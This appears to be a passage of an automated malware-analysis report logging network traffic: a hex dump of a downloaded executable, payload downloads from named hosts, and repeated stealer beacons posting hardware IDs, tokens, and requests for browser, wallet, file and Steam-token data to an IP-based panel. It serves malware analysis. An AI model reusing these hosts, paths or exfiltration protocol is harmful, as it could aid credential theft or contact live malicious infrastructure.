00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:53 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /l.exe HTTP/1.1Host: freewaylumma.online
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: freewaylumma.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?ch=user%7cpgkoujvbvlam++++%7cSSD%7c6000c292b65879ff477a6af604113f58%7c48%7c7%3a58%7c5 HTTP/1.1Host: cl.oud-cdn.de
Source: global traffic HTTP traffic detected: GET /?vhyneVXjVGxXWDBAHPFQ=vMcvSUhjRwUjZHoUBOuO.txt HTTP/1.1Host: cl.oud-cdn.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 43 36 45 43 41 31 33 38 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"80C6ECA1389A291931458------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"mars------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="message"fplugins------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 5747Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: 185.215.113.206Content-Length: 999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="file"------BGIDBKKKKKFBGDGDHIDB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHIIEHIEGDHJJJKFIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBKKKJJJKKEBGDAFIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 4b 4b 4b 4a 4a 4a 4b 4b 45 42 47 44 41 46 49 44 2d 2d 0d 0a Data Ascii: ------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBKKKJJJKKEBGDAFIDContent-Disposition: form-data; name="file"------CFCBKKKJJJKKEBGDAFID--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="message"wallets------DAAAKFHIEGDGCAAAEGDG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 2d 2d 0d 0a Data Ascii: ------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------CAEGHIJEHJDHIDHIDAEHContent-Disposition: form-data; name="message"files------CAEGHIJEHJDHIDHIDAEH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="file"------IDBKFHJEBAAEBGDGDBFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 36 32 35 63 65 34 62 39 66 34 65 63 38 34 66 61 33 31 35 66 63 38 39 61 32 61 63 34 62 38 66 39 66 38 38 37 33 30 37 64 32 37 31 66 33 63 32 62 30 61 66 63 36 62 61 31 64 30 33 31 34 37 33 34 32 33 32 63 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="token"b5625ce4b9f4ec84fa315fc89a2ac4b8f9f887307d271f3c2b0afc6ba1d0314734232c86------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="message"ybncbhylepme------IJKKKFCFHCFIECBGDHID--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
